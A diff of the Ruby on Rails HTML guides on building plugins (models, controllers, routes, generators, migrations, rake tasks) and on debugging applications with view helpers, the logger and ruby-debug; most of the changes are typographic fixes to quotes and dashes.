      vendor/plugins/yaffle/lib/yaffle.rb:

      +end
      +

      This is just a simple test to make sure the class is being loaded correctly. After watching it fail with rake, you can make it pass like so:

      +

      vendor/plugins/yaffle/lib/yaffle.rb:

      $LOAD_PATH << path ActiveSupport::Dependencies.load_paths << path ActiveSupport::Dependencies.load_once_paths.delete(path) -end -
      -

      Adding directories to the load path makes them appear just like files in the the main app directory - except that they are only loaded once, so you have to restart the web server to see the changes in the browser. Removing directories from the load_once_paths allow those changes to picked up as soon as you save the file - without having to restart the web server. This is particularly useful as you develop the plugin.

      -

      vendor/plugins/yaffle/lib/app/models/woodpecker.rb:

      +end +

      Adding directories to the load path makes them appear just like files in the the main app directory - except that they are only loaded once, so you have to restart the web server to see the changes in the browser. Removing directories from the load_once_paths allow those changes to picked up as soon as you save the file - without having to restart the web server. This is particularly useful as you develop the plugin.

      +

      vendor/plugins/yaffle/lib/app/models/woodpecker.rb:

      class Woodpecker < ActiveRecord::Base
      -end
      -
      -

      Finally, add the following to your plugin's schema.rb:

      -

      vendor/plugins/yaffle/test/schema.rb:

      +end +

      Finally, add the following to your plugin’s schema.rb:

      +

      vendor/plugins/yaffle/test/schema.rb:

      create_table :woodpeckers, :force => true do |t|
         t.string :name
      -end
      -
      -

      Now your test should be passing, and you should be able to use the Woodpecker model from within your rails app, and any changes made to it are reflected immediately when running in development mode.

      +end +

      Now your test should be passing, and you should be able to use the Woodpecker model from within your rails app, and any changes made to it are reflected immediately when running in development mode.

      6. Controllers

      -

      This section describes how to add a controller named woodpeckers to your plugin that will behave the same as a controller in your main app. This is very similar to adding a model.

      -

      You can test your plugin's controller as you would test any other controller:

      -

      vendor/plugins/yaffle/test/woodpeckers_controller_test.rb:

      +

      This section describes how to add a controller named woodpeckers to your plugin that will behave the same as a controller in your main app. This is very similar to adding a model.

      +

      You can test your plugin’s controller as you would test any other controller:

      +

      vendor/plugins/yaffle/test/woodpeckers_controller_test.rb:

      get :index assert_response :success end -end -
      -

      This is just a simple test to make sure the controller is being loaded correctly. After watching it fail with rake, you can make it pass like so:

      -

      vendor/plugins/yaffle/lib/yaffle.rb:

      +end
      +

      This is just a simple test to make sure the controller is being loaded correctly. After watching it fail with rake, you can make it pass like so:

      +

      vendor/plugins/yaffle/lib/yaffle.rb:

      $LOAD_PATH << path ActiveSupport::Dependencies.load_paths << path ActiveSupport::Dependencies.load_once_paths.delete(path) -end -
      -

      vendor/plugins/yaffle/lib/app/controllers/woodpeckers_controller.rb:

      +end +

      vendor/plugins/yaffle/lib/app/controllers/woodpeckers_controller.rb:

      render :text => "Squawk!" end -end -
      -

      Now your test should be passing, and you should be able to use the Woodpeckers controller in your app. If you add a route for the woodpeckers controller you can start up your server and go to http://localhost:3000/woodpeckers to see your controller in action.

      +end +

      Now your test should be passing, and you should be able to use the Woodpeckers controller in your app. If you add a route for the woodpeckers controller you can start up your server and go to http://localhost:3000/woodpeckers to see your controller in action.

      7. Helpers

      -

      This section describes how to add a helper named WoodpeckersHelper to your plugin that will behave the same as a helper in your main app. This is very similar to adding a model and a controller.

      -

      You can test your plugin's helper as you would test any other helper:

      -

      vendor/plugins/yaffle/test/woodpeckers_helper_test.rb

      +

      This section describes how to add a helper named WoodpeckersHelper to your plugin that will behave the same as a helper in your main app. This is very similar to adding a model and a controller.

      +

      You can test your plugin’s helper as you would test any other helper:

      +

      vendor/plugins/yaffle/test/woodpeckers_helper_test.rb

      def test_tweet assert_equal "Tweet! Hello", tweet("Hello") end -end -
      -

      This is just a simple test to make sure the helper is being loaded correctly. After watching it fail with rake, you can make it pass like so:

      -

      vendor/plugins/yaffle/lib/yaffle.rb:

      +end
      +

      This is just a simple test to make sure the helper is being loaded correctly. After watching it fail with rake, you can make it pass like so:

      +

      vendor/plugins/yaffle/lib/yaffle.rb:

      $LOAD_PATH << path ActiveSupport::Dependencies.load_paths << path ActiveSupport::Dependencies.load_once_paths.delete(path) -end -
      -

      vendor/plugins/yaffle/lib/app/helpers/woodpeckers_helper.rb:

      +end +

      vendor/plugins/yaffle/lib/app/helpers/woodpeckers_helper.rb:

      "Tweet! #{text}" end -end -
      -

      Now your test should be passing, and you should be able to use the Woodpeckers helper in your app.

      +end +

      Now your test should be passing, and you should be able to use the Woodpeckers helper in your app.

      8. Routes

      -

      In a standard routes.rb file you use routes like map.connect or map.resources. You can add your own custom routes from a plugin. This section will describe how to add a custom method called that can be called with map.yaffles.

      -

      Testing routes from plugins is slightly different from testing routes in a standard rails app. To begin, add a test like this:

      -

      vendor/plugins/yaffle/test/routing_test.rb

      +

      In a standard routes.rb file you use routes like map.connect or map.resources. You can add your own custom routes from a plugin. This section will describe how to add a custom method called that can be called with map.yaffles.

      +

      Testing routes from plugins is slightly different from testing routes in a standard rails app. To begin, add a test like this:

      +

      vendor/plugins/yaffle/test/routing_test.rb

      result = ActionController::Routing::Routes.recognize_path(path, :method => method) assert_equal options, result end -end -
      -

      Once you see the tests fail by running rake, you can make them pass with:

      -

      vendor/plugins/yaffle/lib/yaffle.rb

      +end
      +

      Once you see the tests fail by running rake, you can make them pass with:

      +

      vendor/plugins/yaffle/lib/yaffle.rb

      -
      require "yaffle/routing"
      -
      -

      vendor/plugins/yaffle/lib/yaffle/routing.rb

      +
      require "yaffle/routing"
      +

      vendor/plugins/yaffle/lib/yaffle/routing.rb

      end end -ActionController::Routing::RouteSet::Mapper.send :include, Yaffle::Routing::MapperExtensions -
      -

      config/routes.rb

      +ActionController::Routing::RouteSet::Mapper.send :include, Yaffle::Routing::MapperExtensions +

      config/routes.rb

      ActionController::Routing::Routes.draw do |map|
         map.yaffles
      -end
      -
      -

      You can also see if your routes work by running rake routes from your app directory.

      +end +

      You can also see if your routes work by running rake routes from your app directory.

      9. Generators

      -

      Many plugins ship with generators. When you created the plugin above, you specified the —with-generator option, so you already have the generator stubs in vendor/plugins/yaffle/generators/yaffle.

      -

      Building generators is a complex topic unto itself and this section will cover one small aspect of generators: generating a simple text file.

      +

      Many plugins ship with generators. When you created the plugin above, you specified the --with-generator option, so you already have the generator stubs in vendor/plugins/yaffle/generators/yaffle.

      +

      Building generators is a complex topic unto itself and this section will cover one small aspect of generators: generating a simple text file.

      9.1. Testing generators

      -

      Many rails plugin authors do not test their generators, however testing generators is quite simple. A typical generator test does the following:

      -
        +

        Many rails plugin authors do not test their generators, however testing generators is quite simple. A typical generator test does the following:

        +
        • Creates a new fake rails root directory that will serve as destination @@ -1217,8 +1186,8 @@ Removes the fake rails root

        -

        This section will describe how to create a simple generator that adds a file. For the generator in this section, the test could look something like this:

        -

        vendor/plugins/yaffle/test/definition_generator_test.rb

        +

        This section will describe how to create a simple generator that adds a file. For the generator in this section, the test could look something like this:

        +

        vendor/plugins/yaffle/test/definition_generator_test.rb

        Dir.glob(File.join(fake_rails_root, "*")) end -end -
        -

        You can run rake from the plugin directory to see this fail. Unless you are doing more advanced generator commands it typically suffices to just test the Generate script, and trust that rails will handle the Destroy and Update commands for you.

        -

        To make it pass, create the generator:

        -

        vendor/plugins/yaffle/generators/yaffle_definition/yaffle_definition_generator.rb

        +end
      +

      You can run rake from the plugin directory to see this fail. Unless you are doing more advanced generator commands it typically suffices to just test the Generate script, and trust that rails will handle the Destroy and Update commands for you.

      +

      To make it pass, create the generator:

      +

      vendor/plugins/yaffle/generators/yaffle_definition/yaffle_definition_generator.rb

      m.file "definition.txt", "definition.txt" end end -end -
      +end

      9.2. The USAGE file

      -

      If you plan to distribute your plugin, developers will expect at least a minimum of documentation. You can add simple documentation to the generator by updating the USAGE file.

      -

      Rails ships with several built-in generators. You can see all of the generators available to you by typing the following at the command line:

      +

      If you plan to distribute your plugin, developers will expect at least a minimum of documentation. You can add simple documentation to the generator by updating the USAGE file.

      +

      Rails ships with several built-in generators. You can see all of the generators available to you by typing the following at the command line:

      ./script/generate
      -

      You should see something like this:

      +

      You should see something like this:

      Installed Generators
         Plugins (vendor/plugins): yaffle_definition
         Builtin: controller, integration_test, mailer, migration, model, observer, plugin, resource, scaffold, session_migration
      -

      When you run script/generate yaffle_definition -h you should see the contents of your vendor/plugins/yaffle/generators/yaffle_definition/USAGE.

      -

      For this plugin, update the USAGE file could look like this:

      +

      When you run script/generate yaffle_definition -h you should see the contents of your vendor/plugins/yaffle/generators/yaffle_definition/USAGE.

      +

      For this plugin, update the USAGE file could look like this:

      Description:
      @@ -1297,10 +1264,10 @@ http://www.gnu.org/software/src-highlite -->
       

      10. Generator Commands

      -

      You may have noticed above that you can used one of the built-in rails migration commands migration_template. If your plugin needs to add and remove lines of text from existing files you will need to write your own generator methods.

      -

      This section describes how you you can create your own commands to add and remove a line of text from config/routes.rb.

      -

      To start, add the following test method:

      -

      vendor/plugins/yaffle/test/route_generator_test.rb

      +

      You may have noticed above that you can used one of the built-in rails migration commands migration_template. If your plugin needs to add and remove lines of text from existing files you will need to write your own generator methods.

      +

      This section describes how you you can create your own commands to add and remove a line of text from config/routes.rb.

      +

      To start, add the following test method:

      +

      vendor/plugins/yaffle/test/route_generator_test.rb

      File.join(fake_rails_root, "config", "routes.rb") end -end -
      -

      Run rake to watch the test fail, then make the test pass add the following:

      -

      vendor/plugins/yaffle/lib/yaffle.rb

      +end
      +

      Run rake to watch the test fail, then make the test pass add the following:

      +

      vendor/plugins/yaffle/lib/yaffle.rb

      -
      require "yaffle/commands"
      -
      -

      vendor/plugins/yaffle/lib/yaffle/commands.rb

      +
      require "yaffle/commands"
      +

      vendor/plugins/yaffle/lib/yaffle/commands.rb

      Rails::Generator::Commands::Create.send :include, Yaffle::Generator::Commands::Create Rails::Generator::Commands::Destroy.send :include, Yaffle::Generator::Commands::Destroy Rails::Generator::Commands::List.send :include, Yaffle::Generator::Commands::List -Rails::Generator::Commands::Update.send :include, Yaffle::Generator::Commands::Update -
      -

      vendor/plugins/yaffle/generators/yaffle/yaffle_route_generator.rb

      +Rails::Generator::Commands::Update.send :include, Yaffle::Generator::Commands::Update +

      vendor/plugins/yaffle/generators/yaffle/yaffle_route_generator.rb

      m.yaffle_route end end -end -
      -

      To see this work, type:

      +end +

      To see this work, type:

      ./script/generate yaffle_route
      @@ -1442,16 +1405,16 @@ http://www.gnu.org/software/src-highlite -->
       Note
       
      -
      Editor's note:
      If you haven't set up the custom route from above, script/destroy will fail and you'll have to remove it manually.

    11. Migrations

    -

    If your plugin requires changes to the app's database you will likely want to somehow add migrations. Rails does not include any built-in support for calling migrations from plugins, but you can still make it easy for developers to call migrations from plugins.

    -

    If you have a very simple needs, like creating a table that will always have the same name and columns, then you can use a more simple solution, like creating a custom rake task or method. If your migration needs user input to supply table names or other options, you probably want to opt for generating a migration.

    -

    Let's say you have the following migration in your plugin:

    -

    vendor/plugins/yaffle/lib/db/migrate/20081116181115_create_birdhouses.rb:

    +

    If your plugin requires changes to the app’s database you will likely want to somehow add migrations. Rails does not include any built-in support for calling migrations from plugins, but you can still make it easy for developers to call migrations from plugins.

    +

    If you have a very simple needs, like creating a table that will always have the same name and columns, then you can use a more simple solution, like creating a custom rake task or method. If your migration needs user input to supply table names or other options, you probably want to opt for generating a migration.

    +

    Let’s say you have the following migration in your plugin:

    +

    vendor/plugins/yaffle/lib/db/migrate/20081116181115_create_birdhouses.rb:

    def self.down drop_table :birdhouses end -end -
    -

    Here are a few possibilities for how to allow developers to use your plugin migrations:

    +end
    +

    Here are a few possibilities for how to allow developers to use your plugin migrations:

    11.1. Create a custom rake task

    -

    vendor/plugins/yaffle/lib/db/migrate/20081116181115_create_birdhouses.rb:

    +

    vendor/plugins/yaffle/lib/db/migrate/20081116181115_create_birdhouses.rb:

    def self.down drop_table :birdhouses end -end -
    -

    vendor/plugins/yaffle/tasks/yaffle.rake:

    +end
    +

    vendor/plugins/yaffle/tasks/yaffle.rake:

    Rake::Task["db:schema:dump"].invoke if ActiveRecord::Base.schema_format == :ruby end end -end -
    +end

    11.2. Call migrations directly

    -

    vendor/plugins/yaffle/lib/yaffle.rb:

    +

    vendor/plugins/yaffle/lib/yaffle.rb:

    Dir.glob(File.join(File.dirname(__FILE__), "db", "migrate", "*")).each do |file|
       require file
    -end
    -
    -

    db/migrate/20081116181115_create_birdhouses.rb:

    +end +

    db/migrate/20081116181115_create_birdhouses.rb:

    def self.down Yaffle::CreateBirdhouses.down end -end -
    +end
    +
    Editor’s note:
    several plugin frameworks such as Desert and Engines provide more advanced plugin functionality.
    Note -
    Editor's note:
    several plugin frameworks such as Desert and Engines provide more advanced plugin functionality.

    11.3. Generate migrations

    -

    Generating migrations has several advantages over other methods. Namely, you can allow other developers to more easily customize the migration. The flow looks like this:

    -
      +

      Generating migrations has several advantages over other methods. Namely, you can allow other developers to more easily customize the migration. The flow looks like this:

      +
      • call your script/generate script and pass in whatever options they need @@ -1558,8 +1516,8 @@ examine the generated migration, adding/removing columns or other options as nec

      -

      This example will demonstrate how to use one of the built-in generator methods named migration_template to create a migration file. Extending the rails migration generator requires a somewhat intimate knowledge of the migration generator internals, so it's best to write a test first:

      -

      vendor/plugins/yaffle/test/yaffle_migration_generator_test.rb

      +

      This example will demonstrate how to use one of the built-in generator methods named migration_template to create a migration file. Extending the rails migration generator requires a somewhat intimate knowledge of the migration generator internals, so it’s best to write a test first:

      +

      vendor/plugins/yaffle/test/yaffle_migration_generator_test.rb

      Dir.glob(File.join(fake_rails_root, "db", "migrate", "*")) end -end -
      +end
    +
    Editor’s note:
    the migration generator checks to see if a migation already exists, and it’s hard-coded to check the db/migrate directory. As a result, if your test tries to generate a migration that already exists in the app, it will fail. The easy workaround is to make sure that the name you generate in your test is very unlikely to actually appear in the app.
    Note -
    Editor's note:
    the migration generator checks to see if a migation already exists, and it's hard-coded to check the db/migrate directory. As a result, if your test tries to generate a migration that already exists in the app, it will fail. The easy workaround is to make sure that the name you generate in your test is very unlikely to actually appear in the app.
    -

    After running the test with rake you can make it pass with:

    -

    vendor/plugins/yaffle/generators/yaffle/yaffle_generator.rb

    +

    After running the test with rake you can make it pass with:

    +

    vendor/plugins/yaffle/generators/yaffle/yaffle_generator.rb

    assigns[:attributes] = [Rails::Generator::GeneratedAttribute.new("last_squawk", "string")] end end -end -
    -

    The generator creates a new file in db/migrate with a timestamp and an add_column statement. It reuses the built in rails migration_template method, and reuses the built-in rails migration template.

    -

    It's courteous to check to see if table names are being pluralized whenever you create a generator that needs to be aware of table names. This way people using your generator won't have to manually change the generated files if they've turned pluralization off.

    -

    To run the generator, type the following at the command line:

    +end +

    The generator creates a new file in db/migrate with a timestamp and an add_column statement. It reuses the built in rails migration_template method, and reuses the built-in rails migration template.

    +

    It’s courteous to check to see if table names are being pluralized whenever you create a generator that needs to be aware of table names. This way people using your generator won’t have to manually change the generated files if they’ve turned pluralization off.

    +

    To run the generator, type the following at the command line:

    ./script/generate yaffle_migration bird
    -

    and you will see a new file:

    -

    db/migrate/20080529225649_add_yaffle_fields_to_birds.rb

    +

    and you will see a new file:

    +

    db/migrate/20080529225649_add_yaffle_fields_to_birds.rb

    def self.down remove_column :birds, :last_squawk end -end -
    +end

    12. Rake tasks

    -

    When you created the plugin with the built-in rails generator, it generated a rake file for you in vendor/plugins/yaffle/tasks/yaffle.rake. Any rake task you add here will be available to the app.

    -

    Many plugin authors put all of their rake tasks into a common namespace that is the same as the plugin, like so:

    -

    vendor/plugins/yaffle/tasks/yaffle.rake

    +

    When you created the plugin with the built-in rails generator, it generated a rake file for you in vendor/plugins/yaffle/tasks/yaffle.rake. Any rake task you add here will be available to the app.

    +

    Many plugin authors put all of their rake tasks into a common namespace that is the same as the plugin, like so:

    +

    vendor/plugins/yaffle/tasks/yaffle.rake

    task :squawk => :environment do puts "squawk!" end -end -
    -

    When you run rake -T from your plugin you will see:

    +end
    +

    When you run rake -T from your plugin you will see:

    yaffle:squawk             # Prints out the word 'Yaffle'
    -

    You can add as many files as you want in the tasks directory, and if they end in .rake Rails will pick them up.

    -

    Note that tasks from vendor/plugins/yaffle/Rakefile are not available to the main app.

    +

    You can add as many files as you want in the tasks directory, and if they end in .rake Rails will pick them up.

    +

    Note that tasks from vendor/plugins/yaffle/Rakefile are not available to the main app.

    13. PluginGems

    -

    Turning your rails plugin into a gem is a simple and straightforward task. This section will cover how to turn your plugin into a gem. It will not cover how to distribute that gem.

    -

    Historically rails plugins loaded the plugin's init.rb file. In fact some plugins contain all of their code in that one file. To be compatible with plugins, init.rb was moved to rails/init.rb.

    -

    It's common practice to put any developer-centric rake tasks (such as tests, rdoc and gem package tasks) in Rakefile. A rake task that packages the gem might look like this:

    -

    vendor/plugins/yaffle/Rakefile:

    +

    Turning your rails plugin into a gem is a simple and straightforward task. This section will cover how to turn your plugin into a gem. It will not cover how to distribute that gem.

    +

    Historically rails plugins loaded the plugin’s init.rb file. In fact some plugins contain all of their code in that one file. To be compatible with plugins, init.rb was moved to rails/init.rb.

    +

    It’s common practice to put any developer-centric rake tasks (such as tests, rdoc and gem package tasks) in Rakefile. A rake task that packages the gem might look like this:

    +

    vendor/plugins/yaffle/Rakefile:

    # Dir.glob(File.join(File.dirname(__FILE__), "db", "migrate", "*")).each do |file| # require file # end -

    15.3. Final plugin directory structure

    -

    The final plugin should have a directory structure that looks something like this:

    +

    The final plugin should have a directory structure that looks something like this:

    |-- MIT-LICENSE
    diff --git a/railties/doc/guides/html/debugging_rails_applications.html b/railties/doc/guides/html/debugging_rails_applications.html
    index 0653caaf7a..7807da98b7 100644
    --- a/railties/doc/guides/html/debugging_rails_applications.html
    +++ b/railties/doc/guides/html/debugging_rails_applications.html
    @@ -280,8 +280,8 @@ ul#navMain {
     				

    Debugging Rails Applications

    -

    This guide introduces techniques for debugging Ruby on Rails applications. By referring to this guide, you will be able to:

    -
      +

      This guide introduces techniques for debugging Ruby on Rails applications. By referring to this guide, you will be able to:

      +
      • Understand the purpose of debugging @@ -289,7 +289,7 @@ Understand the purpose of debugging

      • -Track down problems and issues in your application that your tests aren't identifying +Track down problems and issues in your application that your tests aren’t identifying

      • @@ -307,8 +307,8 @@ Analyze the stack trace

      1. View Helpers for Debugging

      -

      One common task is to inspect the contents of a variable. In Rails, you can do this with three methods:

      -
        +

        One common task is to inspect the contents of a variable. In Rails, you can do this with three methods:

        +
        • debug @@ -326,7 +326,7 @@ Analyze the stack trace

        1.1. debug

        -

        The debug helper will return a <pre>-tag that renders the object using the YAML format. This will generate human-readable data from any object. For example, if you have this code in a view:

        +

        The debug helper will return a <pre>-tag that renders the object using the YAML format. This will generate human-readable data from any object. For example, if you have this code in a view:

        <p> <b>Title:</b> <%=h @post.title %> -</p> -
    -

    You'll see something like this:

    +</p>
    +

    You’ll see something like this:

    --- !ruby/object:Post
    @@ -355,7 +354,7 @@ attributes_cache: {}
     Title: Rails debugging guide

    1.2. to_yaml

    -

    Displaying an instance variable, or any other object or method, in yaml format can be achieved this way:

    +

    Displaying an instance variable, or any other object or method, in yaml format can be achieved this way:

    <p> <b>Title:</b> <%=h @post.title %> -</p> -
    -

    The to_yaml method converts the method to YAML format leaving it more readable, and then the simple_format helper is used to render each line as in the console. This is how debug method does its magic.

    -

    As a result of this, you will have something like this in your view:

    +</p> +

    The to_yaml method converts the method to YAML format leaving it more readable, and then the simple_format helper is used to render each line as in the console. This is how debug method does its magic.

    +

    As a result of this, you will have something like this in your view:

    --- !ruby/object:Post
    @@ -384,7 +382,7 @@ attributes_cache: {}
     Title: Rails debugging guide

    1.3. inspect

    -

    Another useful method for displaying object values is inspect, especially when working with arrays or hashes. This will print the object value as a string. For example:

    +

    Another useful method for displaying object values is inspect, especially when working with arrays or hashes. This will print the object value as a string. For example:

    <p> <b>Title:</b> <%=h @post.title %> -</p> -
    -

    Will be rendered as follows:

    +</p> +

    Will be rendered as follows:

    [1, 2, 3, 4, 5]
    @@ -404,23 +401,21 @@ http://www.gnu.org/software/src-highlite -->
     Title: Rails debugging guide

    1.4. Debugging Javascript

    -

    Rails has built-in support to debug RJS, to active it, set ActionView::Base.debug_rjs to true, this will specify whether RJS responses should be wrapped in a try/catch block that alert()s the caught exception (and then re-raises it).

    -

    To enable it, add the following in the Rails::Initializer do |config| block inside environment.rb:

    +

    Rails has built-in support to debug RJS, to active it, set ActionView::Base.debug_rjs to true, this will specify whether RJS responses should be wrapped in a try/catch block that alert()s the caught exception (and then re-raises it).

    +

    To enable it, add the following in the Rails::Initializer do |config| block inside environment.rb:

    -
    config.action_view[:debug_rjs] = true
    -
    -

    Or, at any time, setting ActionView::Base.debug_rjs to true:

    +
    config.action_view[:debug_rjs] = true
    +

    Or, at any time, setting ActionView::Base.debug_rjs to true:

    -
    ActionView::Base.debug_rjs = true
    -
    +
    ActionView::Base.debug_rjs = true
    @@ -432,27 +427,25 @@ http://www.gnu.org/software/src-highlite -->

    2. The Logger

    -

    It can also be useful to save information to log files at runtime. Rails maintains a separate log file for each runtime environment.

    +

    It can also be useful to save information to log files at runtime. Rails maintains a separate log file for each runtime environment.

    2.1. What is The Logger?

    -

    Rails makes use of Ruby's standard logger to write log information. You can also substitute another logger such as Log4R if you wish.

    -

    You can specify an alternative logger in your environment.rb or any environment file:

    +

    Rails makes use of Ruby’s standard logger to write log information. You can also substitute another logger such as Log4R if you wish.

    +

    You can specify an alternative logger in your environment.rb or any environment file:

    ActiveRecord::Base.logger = Logger.new(STDOUT)
    -ActiveRecord::Base.logger = Log4r::Logger.new("Application Log")
    -
    -

    Or in the Initializer section, add any of the following

    +ActiveRecord::Base.logger = Log4r::Logger.new("Application Log")
    +

    Or in the Initializer section, add any of the following

    config.logger = Logger.new(STDOUT)
    -config.logger = Log4r::Logger.new("Application Log")
    -
    +config.logger = Log4r::Logger.new("Application Log")
    @@ -462,17 +455,16 @@ config.logger =

    2.2. Log Levels

    -

    When something is logged it's printed into the corresponding log if the log level of the message is equal or higher than the configured log level. If you want to know the current log level you can call the ActiveRecord::Base.logger.level method.

    -

    The available log levels are: :debug, :info, :warn, :error, and :fatal, corresponding to the log level numbers from 0 up to 4 respectively. To change the default log level, use

    +

    When something is logged it’s printed into the corresponding log if the log level of the message is equal or higher than the configured log level. If you want to know the current log level you can call the ActiveRecord::Base.logger.level method.

    +

    The available log levels are: :debug, :info, :warn, :error, and :fatal, corresponding to the log level numbers from 0 up to 4 respectively. To change the default log level, use

    config.log_level = Logger::WARN # In any environment initializer, or
    -ActiveRecord::Base.logger.level = 0 # at any time
    -
    -

    This is useful when you want to log under development or staging, but you don't want to flood your production log with unnecessary information.

    +ActiveRecord::Base.logger.level = 0 # at any time +

    This is useful when you want to log under development or staging, but you don’t want to flood your production log with unnecessary information.

    - +
    @@ -482,7 +474,7 @@ ActiveRecord::Base2.3. Sending Messages -

    To write in the current log use the logger.(debug|info|warn|error|fatal) method from within a controller, model or mailer:

    +

    To write in the current log use the logger.(debug|info|warn|error|fatal) method from within a controller, model or mailer:

    logger.debug "Person attributes hash: #{@person.attributes.inspect}"
     logger.info "Processing the request..."
    -logger.fatal "Terminating application, raised unrecoverable error!!!"
    -
    -

    Here's an example of a method instrumented with extra logging:

    +logger.fatal "Terminating application, raised unrecoverable error!!!" +

    Here’s an example of a method instrumented with extra logging:

    end # ... -end -
    -

    Here's an example of the log generated by this method:

    +end +

    Here’s an example of the log generated by this method:

    Processing PostsController#create (for 127.0.0.1 at 2008-09-08 11:52:54) [POST]
    @@ -537,24 +527,23 @@ The post was saved and now is the user is going to be redirected...
     Redirected to #<Post:0x20af760>
     Completed in 0.01224 (81 reqs/sec) | DB: 0.00044 (3%) | 302 Found [http://localhost/posts]
    -

    Adding extra logging like this makes it easy to search for unexpected or unusual behavior in your logs. If you add extra logging, be sure to make sensible use of log levels, to avoid filling your production logs with useless trivia.

    +

    Adding extra logging like this makes it easy to search for unexpected or unusual behavior in your logs. If you add extra logging, be sure to make sensible use of log levels, to avoid filling your production logs with useless trivia.

    3. Debugging with ruby-debug

    -

    When your code is behaving in unexpected ways, you can try printing to logs or the console to diagnose the problem. Unfortunately, there are times when this sort of error tracking is not effective in finding the root cause of a problem. When you actually need to journey into your running source code, the debugger is your best companion.

    -

    The debugger can also help you if you want to learn about the Rails source code but don't know where to start. Just debug any request to your application and use this guide to learn how to move from the code you have written deeper into Rails code.

    +

    When your code is behaving in unexpected ways, you can try printing to logs or the console to diagnose the problem. Unfortunately, there are times when this sort of error tracking is not effective in finding the root cause of a problem. When you actually need to journey into your running source code, the debugger is your best companion.

    +

    The debugger can also help you if you want to learn about the Rails source code but don’t know where to start. Just debug any request to your application and use this guide to learn how to move from the code you have written deeper into Rails code.

    3.1. Setup

    -

    The debugger used by Rails, ruby-debug, comes as a gem. To install it, just run:

    +

    The debugger used by Rails, ruby-debug, comes as a gem. To install it, just run:

    -
    $ sudo gem install ruby-debug
    -
    -

    In case you want to download a particular version or get the source code, refer to the project's page on rubyforge.

    -

    Rails has had built-in support for ruby-debug since Rails 2.0. Inside any Rails application you can invoke the debugger by calling the debugger method.

    -

    Here's an example:

    +
    $ sudo gem install ruby-debug
    +

    In case you want to download a particular version or get the source code, refer to the project’s page on rubyforge.

    +

    Rails has had built-in support for ruby-debug since Rails 2.0. Inside any Rails application you can invoke the debugger by calling the debugger method.

    +

    Here’s an example:

    debugger @person = Person.new end -end -
    -

    If you see the message in the console or logs:

    +end +

    If you see the message in the console or logs:

    ***** Debugger requested, but was not available: Start server with --debugger to enable *****
    -

    Make sure you have started your web server with the option —debugger:

    +

    Make sure you have started your web server with the option --debugger:

    => Booting Mongrel (use 'script/server webrick' to force WEBrick) => Rails 2.2.0 application starting on http://0.0.0.0:3000 => Debugger enabled -... -
    +...
    - +
    Tip In development mode, you can dynamically require 'ruby-debug' instead of restarting the server, if it was started without —debugger.In development mode, you can dynamically ‘require 'ruby-debug\’ instead of restarting the server, if it was started without `--debugger.
    -

    In order to use Rails debugging you'll need to be running either WEBrick or Mongrel. For the moment, no alternative servers are supported.

    +

    In order to use Rails debugging you’ll need to be running either WEBrick or Mongrel. For the moment, no alternative servers are supported.

    3.2. The Shell

    -

    As soon as your application calls the debugger method, the debugger will be started in a debugger shell inside the terminal window where you launched your application server, and you will be placed at ruby-debug's prompt (rdb:n). The n is the thread number. The prompt will also show you the next line of code that is waiting to run.

    -

    If you got there by a browser request, the browser tab containing the request will be hung until the debugger has finished and the trace has finished processing the entire request.

    -

    For example:

    +

    As soon as your application calls the debugger method, the debugger will be started in a debugger shell inside the terminal window where you launched your application server, and you will be placed at ruby-debug’s prompt (rdb:n). The n is the thread number. The prompt will also show you the next line of code that is waiting to run.

    +

    If you got there by a browser request, the browser tab containing the request will be hung until the debugger has finished and the trace has finished processing the entire request.

    +

    For example:

    @posts = Post.find(:all)
     (rdb:7)
    -

    Now it's time to explore and dig into your application. A good place to start is by asking the debugger for help… so type: help (You didn't see that coming, right?)

    +

    Now it’s time to explore and dig into your application. A good place to start is by asking the debugger for help... so type: help (You didn’t see that coming, right?)

    (rdb:7) help
    @@ -621,11 +608,11 @@ continue   edit     frame   method  putl  set      tmate   where
    Tip To view the help menu for any command use help <command-name> in active debug mode. For example: help varTo view the help menu for any command use help <command-name> in active debug mode. For example: +help var+
    -

    The next command to learn is one of the most useful: list. You can also abbreviate ruby-debug commands by supplying just enough letters to distinguish them from other commands, so you can also use l for the list command.

    -

    This command shows you where you are in the code by printing 10 lines centered around the current line; the current line in this particular case is line 6 and is marked by .

    +

    The next command to learn is one of the most useful: list. You can also abbreviate ruby-debug commands by supplying just enough letters to distinguish them from other commands, so you can also use l for the list command.

    +

    This command shows you where you are in the code by printing 10 lines centered around the current line; the current line in this particular case is line 6 and is marked by =>.

    (rdb:7) list
    @@ -641,7 +628,7 @@ continue   edit     frame   method  putl  set      tmate   where
    9 format.html # index.html.erb 10 format.xml { render :xml => @posts }
    -

    If you repeat the list command, this time using just l, the next ten lines of the file will be printed out.

    +

    If you repeat the list command, this time using just l, the next ten lines of the file will be printed out.

    (rdb:7) l
    @@ -657,11 +644,11 @@ continue   edit     frame   method  putl  set      tmate   where
    19 respond_to do |format| 20 format.html # show.html.erb
    -

    And so on until the end of the current file. When the end of file is reached, the list command will start again from the beginning of the file and continue again up to the end, treating the file as a circular buffer.

    +

    And so on until the end of the current file. When the end of file is reached, the list command will start again from the beginning of the file and continue again up to the end, treating the file as a circular buffer.

    3.3. The Context

    -

    When you start debugging your application, you will be placed in different contexts as you go through the different parts of the stack.

    -

    ruby-debug creates a content when a stopping point or an event is reached. The context has information about the suspended program which enables a debugger to inspect the frame stack, evaluate variables from the perspective of the debugged program, and contains information about the place where the debugged program is stopped.

    -

    At any time you can call the backtrace command (or its alias where) to print the backtrace of the application. This can be very helpful to know how you got where you are. If you ever wondered about how you got somewhere in your code, then backtrace will supply the answer.

    +

    When you start debugging your application, you will be placed in different contexts as you go through the different parts of the stack.

    +

    ruby-debug creates a content when a stopping point or an event is reached. The context has information about the suspended program which enables a debugger to inspect the frame stack, evaluate variables from the perspective of the debugged program, and contains information about the place where the debugged program is stopped.

    +

    At any time you can call the backtrace command (or its alias where) to print the backtrace of the application. This can be very helpful to know how you got where you are. If you ever wondered about how you got somewhere in your code, then backtrace will supply the answer.

    (rdb:5) where
    @@ -675,18 +662,18 @@ continue   edit     frame   method  putl  set      tmate   where
    at line /PathTo/project/vendor/rails/actionpack/lib/action_controller/filters.rb:617 ...
    -

    You move anywhere you want in this trace (thus changing the context) by using the frame n command, where n is the specified frame number.

    +

    You move anywhere you want in this trace (thus changing the context) by using the frame n command, where n is the specified frame number.

    (rdb:5) frame 2
     #2 ActionController::Base.perform_action_without_filters
            at line /PathTo/project/vendor/rails/actionpack/lib/action_controller/base.rb:1175
    -

    The available variables are the same as if you were running the code line by line. After all, that's what debugging is.

    -

